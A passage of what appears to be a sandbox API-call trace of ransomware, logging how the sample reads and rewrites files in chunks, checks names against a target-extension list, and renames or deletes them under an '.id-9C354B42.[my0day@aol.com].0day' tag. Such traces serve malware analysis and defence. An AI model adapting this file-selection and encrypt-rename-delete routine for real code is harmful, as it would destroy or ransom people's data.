dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.531] ReadFile (in: hFile=0x1d8, lpBuffer=0x3a60058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3a60058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.535] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.535] ReadFile (in: hFile=0x1d8, lpBuffer=0x3aa0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3aa0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.540] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0048.540] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.540] ReadFile (in: hFile=0x1d8, lpBuffer=0x3ae0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ae0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.554] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.554] WriteFile (in: hFile=0x1d8, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0048.571] SetEndOfFile (hFile=0x1d8) returned 1 [0048.571] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3f620a0 [0048.719] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.719] WriteFile (in: hFile=0x1d8, lpBuffer=0x3f620a0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f620a0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.720] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.720] WriteFile (in: hFile=0x1d8, lpBuffer=0x3f620a0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f620a0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.720] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.720] WriteFile (in: hFile=0x1d8, lpBuffer=0x3f620a0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f620a0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.722] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f620a0 | out: hHeap=0x5f0000) returned 1 [0048.722] CloseHandle (hObject=0x1d8) returned 1 [0048.722] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0048.723] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.723] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.723] lstrlenW (lpString=".doc") returned 4 [0048.723] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0048.723] lstrlenW (lpString=".docx") returned 5 [0048.723] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0048.723] lstrlenW (lpString=".pdf") returned 4 [0048.723] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0048.723] lstrlenW (lpString=".xls") returned 4 [0048.723] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0048.723] lstrlenW (lpString=".xlsx") returned 5 [0048.723] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0048.723] lstrlenW (lpString=".ppt") returned 4 [0048.723] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0048.723] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.723] lstrlenW (lpString=".zip") returned 4 [0048.723] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0048.723] lstrlenW (lpString=".rar") returned 4 [0048.723] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0048.723] lstrlenW (lpString=".bz2") returned 4 [0048.723] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0048.723] lstrlenW (lpString=".7z") returned 3 [0048.723] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0048.723] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.723] lstrlenW (lpString=".dbf") returned 4 [0048.723] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0048.723] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.723] lstrlenW (lpString=".1cd") returned 4 [0048.723] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0048.723] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.723] lstrlenW (lpString=".jpg") returned 4 [0048.723] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0048.723] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.724] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.724] lstrlenW (lpString=".doc") returned 4 [0048.724] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0048.724] lstrlenW (lpString=".docx") returned 5 [0048.724] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0048.724] lstrlenW (lpString=".pdf") returned 4 [0048.724] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0048.724] lstrlenW (lpString=".xls") returned 4 [0048.724] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0048.724] lstrlenW (lpString=".xlsx") returned 5 [0048.724] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0048.724] lstrlenW (lpString=".ppt") returned 4 [0048.724] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0048.724] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.724] lstrlenW (lpString=".zip") returned 4 [0048.724] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0048.724] lstrlenW (lpString=".rar") returned 4 [0048.724] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0048.724] lstrlenW (lpString=".bz2") returned 4 [0048.724] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0048.724] lstrlenW (lpString=".7z") returned 3 [0048.724] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0048.724] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.724] lstrlenW (lpString=".dbf") returned 4 [0048.724] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0048.724] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.724] lstrlenW (lpString=".1cd") returned 4 [0048.724] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0048.724] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.724] lstrlenW (lpString=".jpg") returned 4 [0048.724] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0048.724] lstrcmpiW (lpString1=".cab", lpString2=".0day") returned 1 [0048.725] lstrlenW (lpString="VisiorWW.cab") returned 12 [0048.725] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0049.810] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=195011319) returned 1 [0049.810] CloseHandle (hObject=0x1a0) returned 1 [0049.810] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab")) returned 0x2020 [0049.810] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0049.810] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0049.831] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0049.832] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0049.832] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0049.832] ReadFile (in: hFile=0x1a0, lpBuffer=0x3a60058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3a60058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0049.836] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x3dfe0fd, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0049.836] ReadFile (in: hFile=0x1a0, lpBuffer=0x3aa0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3aa0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0049.839] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0049.839] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xb9ba2f7, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0049.839] ReadFile (in: hFile=0x1a0, lpBuffer=0x3ae0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ae0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0049.852] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.853] WriteFile (in: hFile=0x1a0, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0049.866] SetEndOfFile (hFile=0x1a0) returned 1 [0049.866] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3ee2070 [0050.069] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0050.069] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ee2070*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ee2070*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.070] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x3dfe0fd, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0050.070] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ee2070*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ee2070*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.072] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xb9ba2f7, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0050.072] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ee2070*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ee2070*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.074] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ee2070 | out: hHeap=0x5f0000) returned 1 [0050.074] CloseHandle (hObject=0x1a0) returned 1 [0050.074] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0050.074] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0050.074] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0050.074] lstrlenW (lpString=".doc") returned 4 [0050.074] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0050.074] lstrlenW (lpString=".docx") returned 5 [0050.075] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0050.075] lstrlenW (lpString=".pdf") returned 4 [0050.075] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0050.075] lstrlenW (lpString=".xls") returned 4 [0050.075] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0050.075] lstrlenW (lpString=".xlsx") returned 5 [0050.075] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0050.075] lstrlenW (lpString=".ppt") returned 4 [0050.075] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0050.075] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0050.075] lstrlenW (lpString=".zip") returned 4 [0050.075] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0050.075] lstrlenW (lpString=".rar") returned 4 [0050.075] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0050.075] lstrlenW (lpString=".bz2") returned 4 [0050.075] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0050.075] lstrlenW (lpString=".7z") returned 3 [0050.075] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0050.075] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0050.075] lstrlenW (lpString=".dbf") returned 4 [0050.075] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0050.075] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0050.075] lstrlenW (lpString=".1cd") returned 4 [0050.075] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0050.075] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0050.075] lstrlenW (lpString=".jpg") returned 4 [0050.075] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0050.075] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0050.075] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0050.075] lstrlenW (lpString=".doc") returned 4 [0050.075] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0050.075] lstrlenW (lpString=".docx") returned 5 [0050.076] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0050.076] lstrlenW (lpString=".pdf") returned 4 [0050.076] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0050.076] lstrlenW (lpString=".xls") returned 4 [0050.076] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0050.076] lstrlenW (lpString=".xlsx") returned 5 [0050.076] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0050.076] lstrlenW (lpString=".ppt") returned 4 [0050.076] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0050.076] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0050.076] lstrlenW (lpString=".zip") returned 4 [0050.076] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0050.076] lstrlenW (lpString=".rar") returned 4 [0050.076] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0050.076] lstrlenW (lpString=".bz2") returned 4 [0050.076] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0050.076] lstrlenW (lpString=".7z") returned 3 [0050.076] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0050.076] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0050.076] lstrlenW (lpString=".dbf") returned 4 [0050.076] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0050.076] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0050.076] lstrlenW (lpString=".1cd") returned 4 [0050.076] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0050.076] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0050.076] lstrlenW (lpString=".jpg") returned 4 [0050.076] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0050.076] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0050.076] lstrlenW (lpString="DBGHELP.DLL") returned 11 [0050.076] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0051.605] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=1369952) returned 1 [0051.605] CloseHandle (hObject=0x228) returned 1 [0051.605] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll")) returned 0x20 [0051.605] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0051.605] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0051.605] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.605] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.605] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0051.606] GetLastError () returned 0x0 [0051.606] ReadFile (in: hFile=0x228, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0051.669] WriteFile (in: hFile=0x210, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0051.687] ReadFile (in: hFile=0x228, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0x4e770, lpOverlapped=0x0) returned 1 [0051.742] WriteFile (in: hFile=0x210, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x4e780, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0x4e780, lpOverlapped=0x0) returned 1 [0051.750] ReadFile (in: hFile=0x228, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.750] WriteFile (in: hFile=0x210, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0xea, lpOverlapped=0x0) returned 1 [0051.751] SetEndOfFile (hFile=0x210) returned 1 [0051.751] CloseHandle (hObject=0x210) returned 1 [0051.751] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.751] SetEndOfFile (hFile=0x228) returned 1 [0051.754] CloseHandle (hObject=0x228) returned 1 [0051.754] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0051.754] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll")) returned 1 [0051.754] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.754] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.754] lstrlenW (lpString=".doc") returned 4 [0051.754] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0051.754] lstrlenW (lpString=".docx") returned 5 [0051.754] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1 [0051.754] lstrlenW (lpString=".pdf") returned 4 [0051.754] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0051.754] lstrlenW (lpString=".xls") returned 4 [0051.754] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0051.754] lstrlenW (lpString=".xlsx") returned 5 [0051.754] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1 [0051.755] lstrlenW (lpString=".ppt") returned 4 [0051.755] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0051.755] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.755] lstrlenW (lpString=".zip") returned 4 [0051.755] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0051.755] lstrlenW (lpString=".rar") returned 4 [0051.755] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0051.755] lstrlenW (lpString=".bz2") returned 4 [0051.755] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0051.755] lstrlenW (lpString=".7z") returned 3 [0051.755] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0051.755] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.755] lstrlenW (lpString=".dbf") returned 4 [0051.755] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0051.755] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.755] lstrlenW (lpString=".1cd") returned 4 [0051.755] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0051.755] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.755] lstrlenW (lpString=".jpg") returned 4 [0051.755] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0051.755] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.755] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.755] lstrlenW (lpString=".doc") returned 4 [0051.755] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0051.755] lstrlenW (lpString=".docx") returned 5 [0051.755] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1 [0051.755] lstrlenW (lpString=".pdf") returned 4 [0051.755] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0051.755] lstrlenW (lpString=".xls") returned 4 [0051.755] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 